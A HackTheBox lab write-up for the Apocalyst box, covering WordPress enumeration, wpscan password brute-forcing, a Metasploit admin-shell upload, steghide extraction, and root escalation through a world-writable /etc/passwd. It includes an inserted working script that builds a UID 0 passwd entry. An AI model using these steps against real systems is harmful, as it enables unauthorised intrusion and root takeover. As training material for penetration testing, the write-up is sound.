HackTheBox - Apocalyst Writeup

This writeup is for one of the Retired boxes on HackTheBox called Apocalyst [1].

Step 1 - Recon

I started my initial reconnaissance with Nmap, udp-proto-scanner, Nikto and DirBuster. Starting with Nmap, nmap -sS -A -T4 --top-ports 500 against the box showed nothing out of the ordinary: only ports 22 (SSH) and 80 (HTTP) were open.

Next, I added a line mapping the box's IP to apocalyst.htb in my /etc/hosts file and then ran Nikto: nikto -h http://apocalyst.htb/.

Based on the Nikto results and a visit to port 80, we can identify the site as a WordPress installation with loads of interesting folders. My next step was to fire up DirBuster and check the results. DirBuster came back with loads of 200 responses for folders that all contained the same image. That looked a bit odd, and I assumed the image probably had something to do with the challenge. Moving on, I ran wpscan and checked the results. The scans I usually perform with wpscan are:

 wpscan --url http://apocalyst.htb/
 wpscan --url http://apocalyst.htb/ --enumerate u
 wpscan --url http://apocalyst.htb/ --wordlist rockyou.txt --username user
The first is a generic scan; the second enumerates the users registered on the site, and the third brute-forces the wp-login page with a wordlist and a username. (These are the wpscan 2.x flags; wpscan 3.x takes -U for usernames and -P for the password list instead.)

With WordPress, a few of the attack vectors you should keep in mind are:

  1. Exploiting XML-RPC in WordPress [2]
  2. Brute-forcing the login page
  3. The content injection vulnerability in the WordPress REST API [3]
  4. Abusing a plugin with a known vulnerability

To sum up, based on the results so far there is no known exploit or "mistake" that we can use. The only thing that doesn't add up is the existence of more than 30 folders that all contain the same image.

Tools used so far:

 1. nmap
 2. udp-proto-scanner
 3. nikto
 4. dirbuster
 5. wpscan

Step 2 - Hint

I have to say, I couldn't think of anything else at this point. Based on DirBuster, all the folders had the same size and so did all the images. I knew I was close, but I asked for advice in the Slack channel and was told to check out a tool called cewl. cewl creates custom wordlists by spidering a target's website and collecting the unique words it finds.

cewl -w save.txt http://apocalyst.htb/

Step 3 - Exploit

That was it, I knew exactly what to do now. I ran cewl, saved the results to a file and then fed that file to wfuzz with the following command (matching only directories that return 200):

wfuzz -w save.txt --sc 200 http://apocalyst.htb/FUZZ
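To show what cewl actually produces, and why a site-derived wordlist found a folder that generic dictionaries missed, here is an added example (not part of the original writeup, and not cewl itself): a minimal cewl-style extractor that strips HTML tags, splits on non-letters, and keeps unique words of at least three characters, which is cewl's default minimum. The sample HTML is constructed for illustration and is not the real apocalyst.htb page.

```shell
#!/usr/bin/env sh
# Added example, not from the original writeup: a minimal cewl-style word
# extractor. HTML on stdin, unique candidate words (one per line) on stdout.

# Constructed sample page; NOT the real apocalyst.htb content.
SAMPLE_HTML='<html><body>
<h1>Apocalyst</h1>
<p>The path of Rightiousness is narrow; the path of Wrath is wide.</p>
<a href="/blog">blog</a>
</body></html>'

# words_from_html [MIN_LEN]  -- MIN_LEN defaults to 3, like cewl -m 3.
words_from_html() {
    min_len="${1:-3}"
    sed -e 's/<[^>]*>/ /g' \
      | tr -cs '[:alpha:]' '\n' \
      | awk -v n="$min_len" 'length($0) >= n' \
      | sort -u
}

# wordlist_contains WORD  -- true if WORD is in the wordlist built from stdin.
wordlist_contains() {
    words_from_html | grep -qx "$1"
}

# The list that would be saved and fed to: wfuzz -w save.txt --sc 200 http://host/FUZZ
printf '%s\n' "$SAMPLE_HTML" | words_from_html
```

Tags, attribute names and punctuation are discarded, so the folder name hidden in the page's own text ends up in the list alongside ordinary words; this is exactly why a wordlist built from the target beats a generic one when the "secret" directory is named after site content.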

Finally, I found the folder!!

So I downloaded the Rightiousness/image.jpg file. It looks like a steganography challenge, so time to check whether we can solve it with one of the tools below:

 1. stegsolve
 2. steghide
 3. stego helper identification tool - SHIT
 4. exiftool, foremost, hexdump, strings

Steghide gave me the answer; just run the following against the downloaded image (saved locally as index_Rightiousness.jpg):

steghide --extract -sf index_Rightiousness.jpg

The result is a list.txt file, so I used wpscan to brute-force the login page with list.txt as the wordlist and falaraki as the username.

Now that we have a valid username and password, the fastest way to get a shell is through the Metasploit module wp_admin_shell_upload, which uses the WordPress admin credentials to upload a plugin containing a payload.

Step 4 - Getting Root ..{PrivEsc}..

Accessing the user's home folder we see the user.txt file and some extra information: a file called .secret. If you open the .secret file you will see a base64-encoded string. Base64 is an encoding, not encryption, so decoding it (base64 -d) gives falaraki's password for connecting via SSH.

Using the username and password to connect via SSH we get a proper shell, so we can move on and examine the box for weaknesses that will let us escalate our privileges to root. The first things I usually do are:

 1. sudo -l
 2. crontab -l
 3. find / -user root -perm -4000 2>/dev/null
 4. Run a few scripts [4,5,6,7]

In my opinion, this list is enough to give you a pretty good idea of what's going on in the system and to surface plenty of potential issues. Each of those then has to be examined to see whether it can actually be exploited to escalate privileges.

With this box I wasn't paying enough attention to the details, so it took me a day to actually identify the issue. One of the things g0tmi1k describes in his post is that you should pay attention to SUID/SGID binaries and to world-writable files and folders. Here the issue is the /etc/passwd file: it is world-writable, so anyone can append a new UID 0 user with a hashed password in the password field and then switch to it. The process is described below:
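As an added illustration of the technique just described (this is my own example, not the author's steps, which do not appear on the page), the script below checks whether a passwd file is world-writable and builds the entry for a new UID 0 user. The user name pwned, the password and the shell path are arbitrary choices for the example. Nothing here writes to /etc/passwd; the actual append is left as a commented final step.

```shell
#!/usr/bin/env bash
# Added example (not the writeup author's steps): detect a world-writable
# passwd file and build a UID 0 entry for it. Read-only unless you uncomment
# the final append.

# is_world_writable FILE: true when the "others" write bit (o+w) is set.
is_world_writable() {
    local file="$1" mode others
    mode=$(stat -c '%a' "$file" 2>/dev/null) || return 2   # GNU stat octal mode
    others=$(printf '%s' "$mode" | tail -c 1)               # last octal digit
    [ $(( others & 2 )) -ne 0 ]
}

# make_root_entry USER HASH: passwd(5) line with UID 0 / GID 0 and the hash in
# the second field. A real hash there is honoured even when /etc/shadow exists,
# because shadow is only consulted when that field holds "x".
make_root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# hash_password PLAINTEXT: crypt(3)-compatible SHA-512 ($6$) hash via openssl.
hash_password() {
    openssl passwd -6 "$1"
}

# Demonstration against the live file (read-only).
if is_world_writable /etc/passwd; then
    echo "/etc/passwd is world-writable; entry that would grant root:"
    make_root_entry pwned "$(hash_password 'Passw0rd!')"   # example password
    # To exploit:  make_root_entry pwned "$(hash_password 'Passw0rd!')" >> /etc/passwd
    # then:        su pwned
else
    echo "/etc/passwd is not world-writable (expected on a sane system)"
fi
```

openssl passwd -6 needs OpenSSL 1.1.1 or later; on older systems use -1 (MD5-crypt) or mkpasswd from the whois package. Appending a new user is the least noisy option, but with a world-writable /etc/passwd you could equally replace root's own "x" field with a hash. The defensive check is the same one-liner: find / -perm -o+w -type f on a system should never list /etc/passwd.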


[1] HackTheBox
[2] Exploiting XMLRPC in Wordpress
[3] Content Injection Vulnerability in WordPress
[4] LinEnum
[5] LinuxPrivChecker
[6] g0tmi1k Basic Linux Privilege Escalation Techniques
[7] Linux Local Enumeration Script